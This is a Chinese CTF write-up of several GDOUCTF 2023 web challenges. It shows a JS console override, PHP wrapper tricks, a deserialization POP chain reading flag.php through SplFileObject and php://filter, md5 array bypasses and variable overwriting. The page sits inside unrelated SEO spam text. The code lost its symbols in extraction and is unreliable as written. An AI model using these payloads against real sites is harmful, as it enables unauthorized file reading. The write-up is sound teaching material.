当前位置: 首页 > news >正文

网站建设企业宣传册佛山公司官网制作哪家好

网站建设企业宣传册,佛山公司官网制作哪家好,做网站为什么要用php,电商主题wordpress[GDOUCTF 2023]hate eat snake 考察#xff1a;js代码审计 打开题目#xff0c;发现需要坚持60秒#xff0c;那么简单的一个思路就是修改得分的变量60即可 办法1#xff1a;修改变量 右键查看源代码#xff0c;之后发现有一个snake.js的文件#xff0c;ctrlf搜索i…[GDOUCTF 2023]hate eat snake 考察js代码审计 打开题目发现需要坚持60秒那么简单的一个思路就是修改得分的变量60即可 办法1修改变量 右键查看源代码之后发现有一个snake.js的文件ctrlf搜索if发现判断过关的条件是getScore60 搜索发现getScore在Snake.prototype中 在控制台执行 payload Snake.prototype.getScore () 61控制台开始调用函数 在游戏界面再按一下空格得到flag 方法2 先玩游得到分数后在放着界面停留60秒再按空格获取flag [GDOUCTF 2023]泄露的伪装 考察目录扫描php伪协议 由于环境打不开了我就根据别人的wp提供下思路 思路打开题目----目录扫描rar文件下载---代码审计---php伪协议inputdata get参数为?cxkphp://input post参数为ctrl 或者使用下面一种  ?cxkdata://text/plain,ctrl[GDOUCTF 2023]反方向的钟  考察反序列化原生类SplFileObject 打开题目发现一大串代码看到类了猜测考察反序列化需要构造poc链 ?php error_reporting(0); highlight_file(__FILE__); // flag.php class teacher{public $name;public $rank;private $salary;public function __construct($name,$rank,$salary 10000){$this-name $name;$this-rank $rank;$this-salary $salary;} }class classroom{public $name;public $leader;public function __construct($name,$leader){$this-name $name;$this-leader $leader;}public function hahaha(){if($this-name ! one class or $this-leader-name ! ing or $this-leader-rank !department){return False;}else{return True;}} }class school{public $department;public $headmaster;public function __construct($department,$ceo){$this-department $department;$this-headmaster $ceo;}public function IPO(){if($this-headmaster ong){echo Pretty Good ! Ctfer!\n;echo new $_POST[a]($_POST[b]);}}public function __wakeup(){if($this-department-hahaha()) {$this-IPO();}} }if(isset($_GET[d])){unserialize(base64_decode($_GET[d])); } ? 分析 能利用原生类SplFileObject读取文件 找到最核心的IPO()关键点new $_POST[‘a’] ($_POST[‘b’]) 可以POST请求利用原生类读取文件获得flag(base64编码) 步骤 要执行IPO()看到__wakeup()下要先执行hahaha() 再找到hahaha()所在的类为classroom要使返回为真三个变量赋值得为对应的值leader指向name和rank的值也就说明$leadernew teacher()发现name和rank是在teacher类那里 构造poc链 ?php class teacher{public $nameing;public $rankdepartment;private $salary; }class classroom{public $nameone class;public $leader; }class school{public $department;public $headmasterong; }$anew school(); $a-departmentnew classroom(); $a-department-leadernew teacher(); echo base64_encode(serialize($a));Tzo2OiJzY2hvb2wiOjI6e3M6MTA6ImRlcGFydG1lbnQiO086OToiY2xhc3Nyb29tIjoyOntzOjQ6Im5hbWUiO3M6OToib25lIGNsYXNzIjtzOjY6ImxlYWRlciI7Tzo3OiJ0ZWFjaGVyIjozOntzOjQ6Im5hbWUiO3M6MzoiaW5nIjtzOjQ6InJhbmsiO3M6MTA6ImRlcGFydG1lbnQiO3M6MTU6IgB0ZWFjaGVyAHNhbGFyeSI7aToxMDAwMDt9fXM6MTA6ImhlYWRtYXN0ZXIiO3M6Mzoib25nIjt9之后利用原生类SplFileObject读取文件 a为类,b用php协议读取flag.php   /代码中说了flag在flag.php中 所以POST的payload为: aSplFileObjectbphp://filter/readconvert.base64-encode/resourceflag.php 进行访问 得到base64编码我们再进行解码得到flag ?php $flag NSSCTF{c18adac3-acf0-4efa-ab63-10279c78c08d}; ? [GDOUCTF 2023]受不了一点 考察md5绕过强/弱类型比较变量覆盖 打开题目得到源码 ?php error_reporting(0); header(Content-type:text/html;charsetutf-8); if(isset($_POST[gdou])isset($_POST[ctf])){$b$_POST[ctf];$a$_POST[gdou];if($_POST[gdou]!$_POST[ctf] md5($a)md5($b)){if(isset($_COOKIE[cookie])){if ($_COOKIE[cookie]j0k3r){if(isset($_GET[aaa]) isset($_GET[bbb])){$aaa$_GET[aaa];$bbb$_GET[bbb];if($aaa114514 $bbb114514 $aaa!$bbb){$give cancanwordflag;$get hacker!;if(isset($_GET[flag]) isset($_POST[flag])){die($give);}if($_POST[flag] flag || $_GET[flag] flag){die($get);}foreach ($_POST as $key $value) {$$key $value;}foreach ($_GET as $key $value) {$$key $$value;}echo $flag;}else{echo 洗洗睡吧;}}else{echo 行不行啊细狗;}} } else {echo 菜菜; } }else{echo 就这?; } }else{echo 别来沾边; } ? 别来沾边 初步分析我们需要进行四组绕过  if($_POST[gdou]!$_POST[ctf] md5($a)md5($b)) 这里我们需要进行md5绕过并且为强类型比较绕过我们可以考虑用数组绕过也可以用md5碰撞进行绕过 md5()函数无法处理数组如果传入的为数组会返回NULL所以两个数组经过加密后得到的都是NULL,也就是相等的。  例如 a[]1b[]2 gdou[]1ctf[]2 //绕过第一步 这里为简单的cookie赋值我们用火狐浏览器的hackbar插件就能修改cookie的值  if ($_COOKIE[cookie]j0k3r 这里为弱比较类型的绕过我们可以用小数点进行绕过 也可以后面加字符进行绕过 if($aaa114514 $bbb114514 $aaa!$bbb 构造payload aaa114514bbb114514.a 接着下面这里考察的是变量覆盖 if($_POST[flag] flag || $_GET[flag] flag){die($get);}foreach ($_POST as $key $value) {$$key $value;}foreach ($_GET as $key $value) {$$key $$value;}echo $flag; 直接构造payload变色的变量可以改变但与后面的需要相同 123flagflag123 最后抓包构造所有的payload POST /?aaa114514bbb114514a123flagflag123 post参数 gdou[]1ctf[]2 [GDOUCTF 2023]EZ WEB 考察http协议 由于环境开启不了看了下别人的wp讲讲思路 思路右键查看网页源代码---访问有关于flag的路由---BP抓包修改请求方式为POST
http://www.dnsts.com.cn/news/11743.html

相关文章:

  • 大唐工作室 网站制作建一个商城网站需要多少钱
  • 企业做网站 里面都写什么网站上做旅游卖家要学什么
  • 苏州专业高端网站建设公司哪家好西安市seo排名按天优化
  • 网站编辑工作内容怎么写定制网站和模板网站
  • 黑龙江省建设教育网站查询福建省住房与城乡建设部网站
  • 做的网站在百度搜索不到怎么做全民夺宝网站
  • 莱芜四中网站头条指数
  • 网站开发哪些专业宣传平台
  • 响应式网站建设网站网站平台建设的实训报告
  • 山西省建设银行网站首页做室内设计的网站
  • 网站漏洞以及找后台入口 等功能.顺义便宜的建站公司
  • 济南行业网站建设destoon 网站后台显示不出模板
  • 温州知名网站推广网站app开发平台
  • 化工销售怎么做网站wordpress友情链接显示个数
  • wordpress搭建tag页面东营做网站优化价格
  • 佟年做网站给KK中铁建设集团有限公司招投标平台
  • 济南建设企业网站门户网站建设原则
  • 怎样做理财网站php网站开发实验报告
  • 浏览器怎么连接网站的合肥做网站公司哪家好
  • 数据网站厦门建设网站的公司
  • 专做衬衣的网站从域名角度看网站建设注意事项
  • 做网站如何被收录wordpress主题如何修改
  • 制作网站团队人员室内设计手绘图 基础入门
  • 上海建设牌电动三轮官方网站办公空间设计主题名称
  • 视频网站开发视频vs2015 网站开发
  • 门户网站开发哪家好小程序商城怎么推广引流
  • 企业网站建设的原则wordpress 悬浮栏
  • 梧州网站设计理念成都网站开发培训
  • 清远市专业网站制作chinacd wordpress
  • 有没有做的很炫的科技型网站互联网保险与传统保险的区别